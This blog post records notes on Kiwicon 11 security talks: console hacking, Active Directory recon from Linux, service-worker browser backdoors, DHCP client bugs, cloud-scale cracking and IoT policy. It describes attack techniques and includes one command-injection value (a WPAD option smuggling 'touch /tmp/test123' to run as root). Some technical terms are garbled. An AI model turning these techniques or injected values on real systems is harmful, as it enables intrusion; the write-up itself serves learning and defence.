Kiwicon 11 Day 1 Afternoon

After a nice lunch at Husk (dirty fries and a very nice chocolate malt stout, in case you’re wondering), we’re back into it.

Lessons from game consoles and the coming security apocalypse

Boyd Multerer

Ex-Microsoft, where he worked on the XBox team for 15 years, seeing three different XBoxes; he helped build the X Box Live datacentre and XNA; he spent the last five years at Microsoft working on the operating system team. His focus for this talk is not around the datacentre or Live network, but understanding that game consoles are big, high-performance IoT devices. If you’re thinking about the future of computing, you could learn a lot from the history of consoles.

The posture of game consoles is very different to the general-purpose PC:

  • PCs are generally only attacked by external parties.
  • Consoles are often attacked by people who are working with the owner of the console.
    • People who don’t want to pay for games.
    • People who want to repurpose the console to e.g. run Linux.
    • People who want to cheat to win.

The GoldenEye Attack

This was on the first X-Box. The game would save a screenshot of the position on the memory card as part of the save game. People could edit the file on a PC, and then stick it back in the XBox. A picture of a penguin with the data corrupted to cause an overflow and allow people to run Linux.

If you don’t control the physical environment, you must sign all the things, scan inputs more carefully, and so on.

You Can’t Trust Anything

You can’t trust anything going over the bus, or your devices (such as the XBox 360 drive). It’s common to have drives with re-written firmware that fakes valid disks.

The Attack

As the game is being read, the game code and content is checked cryptographically before being run in order to be sure it hasn’t been tampered with. But hackers put a chip on that watches the checks, waits until the processor is executing the right code, sees the register filling up with non-zero values, then drops the voltage to the processor to zero the register, which is interpreted as success, and allows the bad code to run.

So you can’t trust the register or memory, either.

Xbox One

The XBox has raised the bar massively around these things, but there are still weaknesses and vulnerabilities are being found, particularly around drivers and other dev-shipped content.


  • You can’t trust anything on the circut board. They can be read and manipulated.
  • Don’t trust memory or even registers.
  • Ultimately, you can’t trust secrets in the CPU: anything that can be influence by touching the motherboard or pins can and will be tampered with.
  • Assume memory is compromised.
  • Assume data on the bus has been leaked.
  • Every driver is an attack vector.

The last point is particularly critical. Why do you trust drivers? Who wrote them? Where do they come from.


Boyd believes this is the future of security - “we are all gonna have to get a lot more familiar with FGPAs”.

  • Move all security here.
    • “Your key material can never be in addressible memory”.
    • All key material and code must live here.
  • PUFs.
    • Physically Unplumbable Function.
    • In every chip there are quantum effects that unalign components on the chip; every processor is effectively unique.
    • This is normally smoothed over in chip design; in security you might want to amplify and use the misalignment to make the calculations run on the microvariation of transistors as a source of unit-specific entropy.
  • Must be in the same die as the CPU.
    • If it is on another die, it can be tapped into too easily.


  • Macrokernels are doomed. Microkernels are the only way to be properly secure, eliminating the drivers from privileged space.
  • All drivers must be in user mode.
  • Isolate as much as possible.
    • “I’ve become a huge fan of Erlang.”
    • You should be able to take down the smallest failing unit without taking down the system.
  • Formal modeling.
    • Take a look at Isobel.
    • You can build both a mathematical proof that can be tested, but also then test your data against the proof.
    • “It takes about 20 lines of proof for every line of C.”
    • It’s a huge pain in the butt, but there are proofs for filesystems and kernels.

“Microkernels are not new. Move from the 1980s to the 1990s.” He acknowledges there is some performance penality around this “but modern microkernels have better performance.”

Living w/o the Land - Active Directory attacks from Linux


  • Living on the land: You’ve got PowerShell! It does the thing!
    • Unfortunately it has logging and things.
    • This makes you sad.
  • So what happens if you don’t have a domain joined machine?
    • rpcclient
    • smbclient
    • lmpacket
    • Responder
    • net
    • Metasploit
    • ldapdomaindump - this is awesome. Don’t need a domain joined machine to get all sorts of goodness.
    • Write your own.

Writing your own sucks. Happily someone has written an awsome tool called ADRecon. Pity it’s written in PowerShell. Which everyone can log. So that’s not great. So maybe Mubix’s efforts aren’t wasted.

  • AdminCount means you are or have been an Admin.
  • DNS Records are in AD.
  • So are BitLocker passwords.
  • And LAPS passwords.

Presenter chose not to use PHP and Java for unpacking the AD-resident ACLs because reasons that are dumb. Apparently not being able to get Java libraries working makes Java dumb.

Ghosts in the Browser: Backdooring with Service Workers

Claudio Contin & Emmanuel Law

“A lot of people in the security industry are not aware of service workers; this is an exploratory talk on ways to exploit these.”

Exploiting XSS is hard:

  • HTTP-Only flags.
  • Cookies have limited server-side lifespan.
  • Transient payloads.
  • IP Restrictions.

Service workers sit in the background, don’t require any authentication, and don’t run in the frame of your web page; they are the core of progressive web apps (PWA). Service workers are a great way of glossing over network outages, running in the background and queueing work even when disconnected from the server.

Creating a new service worker is simple - navigator.serviceWorker.register('/sw.js') - but there are quite tight registrictions in place around where they can be loaded from. They have a lot of powers”

  • Fetch()
    • Ability to make HTTP requests.
    • XMLHttpRequest deprecated in 2015.
    • Service Workers only have Fetch API availability.
    • Scope is limited to the CORS policy of the parent.
  • Background Sync
    • Register a sync.
    • Activate a sync whenever it is connected.

As an example, this can be used by a C2 proxy to run ServiceWorkers running in the users browser context. THis means that, for example, the ServiceWorker now has the credentials of the web client, such as a user logged into an Internet Banking application (for example).

One challenge with this is that registering only happens once and wakeups of Service Workers happen with no control from the attacker. One way to work around this is to add more Service Workers to smooth out the sync cycle, although there are limits to the number of background syncs you can have installed.

“There are limitations, but can we do more to abuse this thing?”

  • Yes we can: Web Push.
  • This is a notification API.
  • You register a callback API, which can have malicious code in it.
  • The c2 push service asks for permission to run push services. The browser asks the users, some of whom will aggre.
    • Note the first three pushes execute blindly, with no auth required.
    • On the desktop the browser must be running, but on mobile they will activate regardless.
  • Now we can send notifications and run code in the scope of the user browser, exfiltrating data.

  • Fetch Events: Different from the Fetch() API.

  • You can register against service workers, and activate when the service workers become active; they act like a MITM of the service worker infrastructure, inspecting and tampering with the cache in the browser or forcing it to fetch more resources.

  • Unlike the Fetch() API this does have access to manipulate the DOM.


  • No XSS; use a Content Security Policy.
  • Disallow JS Upload.
  • Content-Type: text/plain in the response, which will cause the browser to register your service workers.
  • Use a seperate domain from seperate domains, which limits the scope of places service workers can register against.

Any of the above mitigations will stop these techniques from working.

  • Note Service Workers outlive the XSS and the malcious files. Once the service worker is loaded in the browser it lives forever.

    • You need to actively unregister the service workers when the users visit the site again if you discover your users have been compromised.
  • There are no out-of-the-box ways of disabling or managing service wokers; they have written an extension to manage this in the browser.

Mayday, Mayday, Mayday - Safe Harbour, no more

Eliza Sorensen (@zemmiph0bia)

This talk comes with a content warning.

“As we know, some people cannot be trusted; this is where governments may step in and act in order to protect people.”

In the history of the Internet, the Communications Decency Act was introduced but was shot down by the Supreme Court of the US. A provision of the Telecommunications Act passed in 1996 had a provision that exempted providers from liability (Section 230) as long as they do not exercise editorial control.

The FOSTA-SESTA package was introduced, supposedly to attack sex trafficking, but would not impact consenting sex work. The EFF attacked the legislation, but nevertheless the legislation was approved in 2018, in spite of opposition from sex trafficking and sex worker orgs.

Unfortunately it is also affecting sex worker world-wide, even in New Zealand. While the act claims to improve matters for people who have been trafficked, evidence suggests that when sex work is illegal it renders victims of sexual abuse or sexual trafficking more vulnerable, since they cannot go to the police.

The Internet has actually made sex work safer; when Craigslist allowed sex workers to advertise independently, homicides against women in the use dropped 17%! That’s because sex workers could avoid the likes of pimps and the abuse they perpetrate.

switter is a Mastodon social network with 176,000 users, a mix of sex workers and allies. Unfortunately, CLoudFlare have suspended them from their service. I’ll note that this is the same CloudFlare that’s desperate to keep neo-Nazis online for “free speech.”

So what now? The EFF is fighting a case. We need to “stand the fuck up” and stop allowing “technologies we create” to be used to abuse vulnerable people.

DHCP is Hard

A Story of 5 Bugs

Felix Wilhelm

DHCP is 25 years old and very useful. DHCPv6 is a protocol that no-one uses but everyone supports just in case. This is great for attackers, because it’s an extra attack surface.

Both protocols seem harmless - a small protocol with small packets. So it should be simple enough to be reasonably robust. But there are bugs, and you can exploit and escalate via lateral movement. Client bugs are especially interesting, especially given how common it is for people to use (malicious) access points.

Most fields are uninteresting: fixed fields that are hard to implement poorly, and many are deprecated anyway. Options, on the other hand, are not fixed, with a Type, Length, and Value are specified. Since they’re optional there’s no guarantee a server or client will implement or support any given option or set of options. Note also that the encoding of tyopes differs per option: some are lists of things, some are IP addresses, some are strings.

Encoding and decoding a range of data types opens you up to many, many mistakes. Moreover, options can be repeated and overloaded, and there are also vendor extensions, adding more possibility of errors.

dnsmasq - CVE-2017-14493

Used in many places and “surprisingly popular”. A simple copying bug like it’s 1989. In 2018. Specific to the IPv6 handler, but really?


  • Has server and client components, the latter used in Debian, for example.
  • The client uses refcounting to free up memory structures for handling the options and iterating over them and acting on them.
  • Unfortunately the option handling code will not decrease the structure refcounter, and with enough packets you can overflow the counter and trigger an overflow and use after free error.
  • This is not trivial to trigger (needs 200GB of traffic) but exists and both server and client.
  • Not trivial to exploit.

But that’s just the start of the fun!

  • ISC DHCP client applies settings to the client by passing the information from the options into scripts.
  • And arbitary hooks.
  • So you’re running scripts with parameters from arbitary untrusted sources on the network.
  • While the pretty printer does the right thing as far as formatting binary into text, it uses a static 32k buffer to copy the data into.
  • IPv6 allows 56K option packets.

Network Manager

Continues to make everything worse. It changes all the environmental vars created by dhclient by giving them a different set of naming conventions. Then the Red Hat people integrating this into Fedora, CentOS and RHEL thought it would be a great idea to bulk rename the options back to their dhclient name to be friendly to their legacy scripts. Using eval() blocks in shell scripts. From untrusted input.

So you can e.g. set WPAD to foo' & touch /tmp/test123 will run as root. This was a vulnerability that existed for five years.

systemd’s networkd

  • The good bits: replaces the NetworkManager tire fire.
  • Doesn’t have external dependencies.
  • Modern C.
  • Clean rewrite (for better or worse).
  • But it’s C which is an easy way to harm yourself.
  • And cleanly re-implements an underflow in the DHCPv6.
  • Which is enabled by default.
  • And can’t be disabled.


  • DHCP is harder than you think.
  • DHCPv6 is a rich source of vulnerabilities.

Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale

moloch & mandatory

“Burp Intruder” at infinite QPS.

Normally the limit of Burp is your Internet speed and your single computer. It’s not “web scale”. But we can do the same thing with lambas, storing the data in S3 buckets; these are billed at 20 cents per million requests and the amount of memory you consume. The first million are free.

  • The first lamba invokes more lambas based on a work queue; effectively a recursion.
    • A work queue with more than one element invokes two lambdas.
    • The work queue splits amongst the two lambas.
    • This continues until a lamba has only on item in the queue.
    • At this point the lamba is executed.
  • Out of the box you can run 1,000 lambdas per second.

Cloud Rainbow tables.

  • Rainbow tables a pre-computed attacks against hashed password files.
  • This is good in theory, but iterating over the hash with the rainbow table can become very time-consuming.
  • The file sizes are large, and really need to run on servers.
  • So this makes them ideal for cloud!
  • Google Big Query lets you crap terabytes of JSON and run queries against it.

Cost Effective GPUs

Traditional GPU clusters have high capital cost, ongoing maintainence problems, and horrible power consumption. So what’s the answer:

  • EC2 spot instances.
  • Elastic Beanstalk for management.
  • Auto-scale spot instances can be defined in Elastic Beanstalk so it only triggers on price.
  • API gateways fronting lamba instances.
  • Hash Cat on EC2 to do the work.

Securing a World of Physically Capable Computers

Bruce Schneier

“I think we have some profound changes coming, because everything is turning into a computer, from the smallest things to a power plant. Cars, fridges, you name it.”

We suddenly have to secure everything, everywhere. Here are six lessons:

  1. Most software is poorly written and insecure, because the market doesn’t want to pay for quality software.
  2. We’ve never designed with security in mind, particularly for the Internet, because the endpoints were, originally, trusted.
    • We’re still living with this decision, which we are slowly retrofitting to protocols from the 70s and 80s.
  3. The extensibility of computerised systems can be used against us.
    • Your phone can do anything you want. That never used to be the case.
    • The implications of this are poorly understood. This is why e.g. Internet connected cars can be ransomware.
  4. The complexity of computerised systems means they are vulnerability; complexity is the enemy of security.
    • Security is improving, but complexity is accelerating.
  5. When you connect things together, vulnerabilities multiply.
    • Break-ins happen through HVAC. Through fish tanks.
    • These are hard to fix, because you don’t know who is at fault. Each system could be secure individually, but joining them exposes a vulnerability that didn’t exist before.
  6. Attacks get better, easier, faster.
    • We are used to this, but the rest of the world isn’t.
    • Passwords that were strong enough yesterday aren’t strong enough today.

There are other problems: for one, expertise flows downhill. Yesterday’s super secret NSA technique is today’s FBI tool and tomorrow has script kiddies using it. Stingray devices are a great example of this; they used to be top secret and now eople use them to send spam.

Automation, autonomy, and physical effects are changing security; security experts tend to focus on the first part of confidentiality, integrity, and availability; for example we worry a lot about things like privacy breaches because they are common; while they can be dangerous, there’s perhaps a gulf between an information disclosure from my bank and someone being able to disable the brakes on my car, or take control of an automated weapons system.

In the same vein, there is a fundamental difference between the CPU in your computer crashing, and the controller in your pacemaker. The may even have the same CPU and OS. It’s the context that makes all the difference.

Unfortunately we don’t know how to write secure software; as a result, we’ve become very good at patching. Companies like Apple and Microsoft can ship fixes in very little time, and push them out to hundreds of millions of devices. Unfortunately, we have no idea how to do this for the things that are becoming computers. Many of these new devices - smart fridges, DVRs, smart TVs don’t have a way to patch them, and even if they did, the vendor doesn’t have a team of people standing by to do the work on fixing problems anyway. But we expect these devices to last a decade or more, yet we have no idea how to secure twenty ear old systems.

Will car manufacturers learn to treat software like mechanical parts? We can’t even secure DVRs!

Passwwords are great, but they aren’t strong enough, and 2FA is clumsy even when it’s available. So we’re struggling with people authenticating, but now we need to cope with thing to thing authentication. And not just at the scale of using our phone as an IoT hub for a few dozen devices in our household; it’s having tens of thousands of things talking constantly, and often on an ad-hoc basis - our cars co-ordinating collision detection, for example.

The next disaster is the supply chain. This has always been terrible, but we’ve ignored it because it’s too hard. Can the US trust Kapersky and Huawei? Can China trust Checkpoit and McAfee? What’s really made where? And by who? There’s probably a hundred passports in any team of any consequence at any vendor. We find backdoors in Juniper and D-Link; we can’t even trust the shipping process, since we learned that the busy beavers at the NSA will intercept and interfere with things in the mail.

And while that Bloomberg story probably isn’t true, the most interesting thing it tells us is that we don’t even really know. Our industries are deeply international, and we have no idea what comes from where.

Everything is failing as it becomes connected. We’re seeing our weaknesses revealed. And in the past we haven’t been punished or regulated because it hasn’t really mattererd. But that, Bruce thinks, is going to change. Policy is going to be brought to bear on our industry: standards and regulations. We’ve talked a lot about how tech can subvert the law, but as Snowden showed us, the law can subvert tech. Bruce thinks it’s vitally important that policy ends up going the right way, and he has two key ideas about this:

Firstly, defence must dominate, because everything is now connected. It used to be that it was easy to rationalise sabotaging “their things” because their things and our things had a clean seperation, but this no longer exists. If we allow their stuff to be insecure so we can exploit it, our stuff will also be insecure. If we leave backdoors for “our side”, then their side will be able to use them against us, too.

The second point is that we need to accept better regulation. The devil is in the details - but regulation done right can be good. Many of the Silicon Valley types don’t want to hear this, buit it’s true. Regulation gets us safe food, for example. And regulation is going to happen, so it’s a choice between good and bad regulation, so we’d best get on board.

Equifax got away scot free. Facebook probably will, too. But we can see with the GDPR, or the EU’s emerging standards around interoperability, patch management, or secure by default design that changes are emerging. Since the market doesn’t reward security, we’re going to have to rely on the governments, whether supranational like the EU, or regional like California or New York.

As a result, we need to be involved in policy. Because if the tech isn’t understood and well-represented the policy will be bad. And so we need to share our knowledge and expertise.